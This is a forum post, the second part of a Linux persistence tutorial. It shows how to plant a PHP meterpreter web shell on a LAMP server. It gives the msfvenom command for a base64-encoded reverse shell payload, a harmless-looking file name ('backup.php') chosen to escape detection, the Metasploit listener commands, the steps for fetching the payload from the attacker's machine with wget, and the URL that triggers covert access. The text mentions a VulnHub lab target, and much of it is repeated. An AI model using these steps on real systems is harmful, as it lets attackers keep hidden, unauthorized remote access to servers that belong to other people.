[Linux Persistence] | VIA WEB SHELL - PART 2
Posted: Tue Aug 13, 2024 3:22 am
Requirements:
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 2. PERSISTENCE THROUGH WEB SHELL:
The persistence tactic entails creating and uploading a PHP web shell onto the target server. Assuming that the aforesaid server is operating the LAMP stack, we may forge a PHP meterpreter payload and introduce it to the web server as a means of covert entry.
The initial stage entails generating the PHP meterpreter payload via Msfvenom; this process may be initiated by entering the subsequent command:
To escape detection, we shall spare the payload under the filename "backup.php".
Upon having created the payload, the subsequent phase calls for alteration of the payload, by appending the PHP tags so that the said script is effectively executed, as demonstrated in the accompanying image.
We are now in a position to establish the listener utilising Metasploit by entering the ensuing commands:
The following stage shall encompass the uploading of the PHP shell, which we recently created, unto the internet host. This action may be accomplished by establishing a nearby web server within the Kali Virtual Machine and transmitting it onto the intended recipient.
In this instance, we shall transmit the aforementioned "backup.php" file to the crux of the web server, located beneath the /var/www/html directory, as displayed within the ensuing pictorial representation.
We are capable of acquiring a meterpreter session on the objective by perusing to the aforementioned "backup.php" file located upon the web server. Access may be attained by utilising the following URL within your web browser:
Navigating through the browser in such a manner shall foremostly execute the PHP code, subsequently presenting you with a meterpreter session on your receiver, as illustrated within the ensuing illustration.
Furthermore, we have successfully established continuity by uploading a meterpreter web shell, securing unfettered access to the objective server, without the necessity for authentication via Secure Shell.
- Kali Linux OR Parrot OS
- Practical understanding of T*****/IP
- The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 2. PERSISTENCE THROUGH WEB SHELL:
The persistence tactic entails creating and uploading a PHP web shell onto the target server. Assuming that the aforesaid server is operating the LAMP stack, we may forge a PHP meterpreter payload and introduce it to the web server as a means of covert entry.
The initial stage entails generating the PHP meterpreter payload via Msfvenom; this process may be initiated by entering the subsequent command:
Code: Select all
msfvenom -p php/meterpreter/reverse_t***** LHOST=<KALI-IP> LPORT=<PORT> -e php/base64 -f raw > backup.php
To escape detection, we shall spare the payload under the filename "backup.php".
Upon having created the payload, the subsequent phase calls for alteration of the payload, by appending the PHP tags so that the said script is effectively executed, as demonstrated in the accompanying image.
We are now in a position to establish the listener utilising Metasploit by entering the ensuing commands:
Code: Select all
msfconsole
Code: Select all
use multi/handler
Code: Select all
set payload php/meterpreter/reverse_t*****
Code: Select all
set LHOST <KALI-IP>
Code: Select all
set LPORT <PORT>
Code: Select all
run
The following stage shall encompass the uploading of the PHP shell, which we recently created, unto the internet host. This action may be accomplished by establishing a nearby web server within the Kali Virtual Machine and transmitting it onto the intended recipient.
Code: Select all
sudo python -m SimpleHTTPServer 80
Code: Select all
wget https://<KALI-IP>/backup.php
In this instance, we shall transmit the aforementioned "backup.php" file to the crux of the web server, located beneath the /var/www/html directory, as displayed within the ensuing pictorial representation.
We are capable of acquiring a meterpreter session on the objective by perusing to the aforementioned "backup.php" file located upon the web server. Access may be attained by utilising the following URL within your web browser:
Code: Select all
https://<SERVER-IP>/backup.php
Navigating through the browser in such a manner shall foremostly execute the PHP code, subsequently presenting you with a meterpreter session on your receiver, as illustrated within the ensuing illustration.
Furthermore, we have successfully established continuity by uploading a meterpreter web shell, securing unfettered access to the objective server, without the necessity for authentication via Secure Shell.